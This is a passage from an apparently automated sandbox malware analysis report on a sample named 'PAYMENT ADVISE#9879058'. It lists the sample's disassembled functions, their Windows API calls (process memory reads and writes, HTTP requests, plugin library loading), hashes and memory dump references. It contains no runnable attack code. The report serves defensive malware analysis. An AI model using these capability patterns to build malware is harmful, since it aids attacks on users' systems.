                          • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                          • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                          Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                          • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                          • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                          • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                          Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                          • ___set_flsgetvalue.LIBCMT ref: 004140E1
                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                          • ___fls_getvalue@4.LIBCMT ref: 004140EC
                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                          • ___fls_setvalue@8.LIBCMT ref: 004140FF
                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                          • ExitThread.KERNEL32 ref: 0041410F
                          • GetCurrentThreadId.KERNEL32 ref: 00414115
                          • __freefls@4.LIBCMT ref: 00414135
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                          • String ID:
                          • API String ID: 132634196-0
                          • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                          • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                          • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                          • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                          Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                          Download Yara Rule
                          APIs
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                            • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                          • __getptd_noexit.LIBCMT ref: 00415620
                          • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                          • __freeptd.LIBCMT ref: 0041563B
                          • ExitThread.KERNEL32 ref: 00415643
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                          • String ID:
                          • API String ID: 3798957060-0
                          • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                          • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                          • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                          • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                          Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                          • ___set_flsgetvalue.LIBCMT ref: 00415690
                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                          • ___fls_getvalue@4.LIBCMT ref: 0041569B
                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                          • ___fls_setvalue@8.LIBCMT ref: 004156AD
                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                          • ExitThread.KERNEL32 ref: 004156BD
                          • __freefls@4.LIBCMT ref: 004156D9
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                          • String ID:
                          • API String ID: 1537469427-0
                          • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                          • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                          • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                          • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                          Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _malloc
                          • String ID: Default$|k
                          • API String ID: 1579825452-2254895183
                          • Opcode ID: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                          • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                          • Opcode Fuzzy Hash: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                          • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                          Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID: '$[$h
                          • API String ID: 2931989736-1224472061
                          • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                          • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                          • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                          • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                          Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _strncmp
                          • String ID: >$R$U
                          • API String ID: 909875538-1924298640
                          • Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                          • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                          • Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                          • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                          Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                          • CoInitialize.OLE32(00000000), ref: 0046CE18
                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                          • CoUninitialize.OLE32 ref: 0046CE50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                          • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                          • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                          • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                          Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                          Download Yara Rule
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 176396367-557222456
                          • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                          • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                          • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                          • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                          Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                          • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                          • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Variant$ClearCopyInit_malloc
                          • String ID: 4RH
                          • API String ID: 2981388473-749298218
                          • Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                          • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                          • Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                          • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                          Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • __wcsnicmp.LIBCMT ref: 0046681A
                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                          • String ID: LPT$HH
                          • API String ID: 3035604524-2728063697
                          • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                          • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                          • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                          • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                          Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                            • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$MemoryProcess$ReadWrite
                          • String ID: @
                          • API String ID: 4055202900-2766056989
                          • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                          • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                          • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                          • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                          Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CrackInternet_memset_wcslen
                          • String ID: |
                          • API String ID: 915713708-2343686810
                          • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                          • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                          • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                          • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                          Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                          • HttpQueryInfoW.WININET ref: 0044A892
                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 3705125965-3916222277
                          • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                          • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                          • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                          • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                          Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                          • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                          • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                          • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                          • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                          Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                          • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: AU3_GetPluginDetails
                          • API String ID: 145871493-4132174516
                          • Opcode ID: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                          • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                          • Opcode Fuzzy Hash: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
